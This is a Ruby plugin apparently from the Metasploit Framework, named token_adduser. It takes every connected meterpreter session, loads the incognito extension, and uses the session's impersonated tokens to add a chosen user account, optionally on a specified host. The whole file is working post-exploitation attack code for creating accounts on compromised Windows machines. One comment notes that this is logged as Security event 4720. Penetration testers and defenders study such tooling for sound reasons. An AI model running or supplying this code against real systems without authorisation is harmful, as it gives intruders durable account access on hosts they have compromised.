
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/plugins/token_adduser.rb
#
# $Id$
#
# This is a modified version of token_hunter.rb. Credit to
# jduck (I believe) for much of the base code here.
#
# The goal of this script is to attempt to add a user via
# incognito using all connected meterpreter sessions.
#
# jseely[at]relaysecurity.com
#
# TODO: This should probably find new life as a post module.
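module Msf
  # Console plugin that registers the `token_adduser` command, which asks the
  # incognito extension of every connected meterpreter session to add an
  # account.
  #
  # Detection note for reviewers and blue teams: account creation on Windows
  # hosts is typically recorded as Security event 4720 when account-management
  # auditing is enabled, so a run of this command is a loud, durable artifact.
  class Plugin::TokenAdduser < Msf::Plugin
    # Dispatcher that exposes the plugin's single console command.
    class TokenCommandDispatcher
      include Msf::Ui::Console::CommandDispatcher

      # Result strings after which a host-targeted run stops trying further
      # sessions: the account was created, or the failure does not depend on
      # which session made the attempt.
      STOP_ON_RESULT = /\[\+\] Successfully|\[-\] Password does not meet complexity requirements|\[-\] User already exists/.freeze

      # Label of this dispatcher. Plugin#cleanup below removes the dispatcher
      # by this same string, so the two must stay in sync.
      def name
        'Token Adduser'
      end

      # Maps each console command provided here to its help text.
      def commands
        {
          'token_adduser' => 'Attempt to add an account using all connected meterpreter session tokens'
        }
      end

      # Handler for `token_adduser [-h <host>] <username> <password>`.
      #
      # args - raw console arguments. `-h <host>` is optional; the first two
      #        remaining values are taken as username and password, and any
      #        further positional values are ignored.
      #
      # Prints usage and returns without touching any session when the
      # username or the password is missing.
      def cmd_token_adduser(*args)
        opts = Rex::Parser::Arguments.new(
          '-h' => [ true, 'Add account to host']
        )

        host = nil
        positional = []
        opts.parse(args) do |opt, _idx, val|
          case opt
          when '-h'
            host = val
          else
            # Anything that is not a recognised option is collected in order.
            positional << val
          end
        end

        username, password = positional

        # Both values are required. Checking after parsing also catches
        # "-h <host>" with no credentials and a lone username, which would
        # otherwise reach the session call as nil.
        if username.nil? || password.nil?
          print_line('Usage: token_adduser [options] <username> <password>')
          print_line(opts.usage)
          return
        end

        framework.sessions.each_key do |sid|
          session = framework.sessions[sid]
          next unless session.type == 'meterpreter'

          print_status(">> Opening session #{session.sid} / #{session.session_host}")

          # Load the extension on demand, then re-check: the load can fail.
          session.core.use('incognito') unless session.incognito

          unless session.incognito
            print_status("!! Failed to load incognito on #{session.sid} / #{session.session_host}")
            next
          end

          res = session.incognito.incognito_add_user(host, username, password)
          next unless res

          # Route the result through the dispatcher's output like every other
          # message of this command, instead of writing to stdout directly.
          print_line(res.to_s)

          # Only a host-targeted run stops early. Without -h the attempt is
          # made on every meterpreter session, whatever the earlier results.
          break if host && STOP_ON_RESULT.match?(res.to_s)
        end
      end
    end

    # Registers the command dispatcher when the plugin is loaded.
    def initialize(framework, opts)
      super
      add_console_dispatcher(TokenCommandDispatcher)
    end

    # Unregisters the dispatcher by its label when the plugin is unloaded.
    def cleanup
      remove_console_dispatcher('Token Adduser')
    end

    # Short name of the plugin.
    def name
      'token_adduser'
    end

    # One-line description of the plugin.
    def desc
      'Attempt to add an account using all connected Meterpreter session tokens'
    end
  end
end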